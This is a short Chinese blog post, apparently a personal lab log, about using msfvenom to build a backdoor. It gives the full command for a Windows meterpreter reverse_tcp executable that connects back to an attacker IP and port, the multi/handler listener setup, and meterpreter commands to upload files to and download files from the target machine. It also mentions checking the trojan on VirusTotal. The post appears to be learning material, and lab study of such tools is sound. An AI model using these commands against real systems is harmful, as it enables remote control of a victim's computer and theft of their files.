Msfvenom使用记录

Msfvenom使用记录

Msfvenom是用来生成后门的软件。

 

攻击机:kali

靶机:物理机

使用工具:Msfvenom

 

使用过程:

(1)生成文件

例:(见下图)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe -o /var/payload.exe

说明:

-p指定哪些有效载荷生成,如:windows/meterpreter/reverse_tcp,用于Windows平台的反向远程控制程序

-f指定有效载荷的格式,如:exe,生成Windows系统的可执行文件

-o指定保存位置,如:/var/payload.exe

e8543af8abe74f1eaf8a6b467d82aa64.png

输入msfvenom -h查看帮助选项,这里不一一列举

 

(2)将生成的文件复制到靶机上

 

(3)输入msfvenconsole

d1e9cb772461438aa52a4bda7a2c96f3.png

 

(4)进行配置:

use multi/handler ,选择模块

set payload windows/meterpreter/reverse_tcp ,选择模块

set LHOST 192.168.154.4 ,填写攻击机的IP地址

set LPORT 5000 ,填写生成文件中的端口号

show options ,查看设置参数

exploit ,执行

f493ecf2184d4b218416011d4e43feea.png

运行前打开靶机上的文件,然后再使用exploit

f93e4f685eb44b23866f7fc5655d716f.png

成功

 

(5)可以运行一些指令,这里用的meterpreter,详细的可以自己去查meterpreter的常用指令,

        这里举两个例子:

        将本机上的某文件上传到靶机上的某地址:

        upload [攻击机上的某文件] [靶机上的某地址]

b60d64f439b346c78fcaf4ce297f9870.png

        下载靶机上的某文件到攻击机上:

        download  [靶机上的某文件]

873864b4b4f54ddbb93d46e7e6f3339a.png

28616ab599524e5894c7ef544499ad5f.png

 

(6)可使用安全检测网站检测该木马文件,例如www.virustotal.com

翻译了一下网站

2e7f02425ed24781b6375ca6a494c534.png

结果如下图

6dfd90f39ef34a29a7c3b1cfc4d38c40.png

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值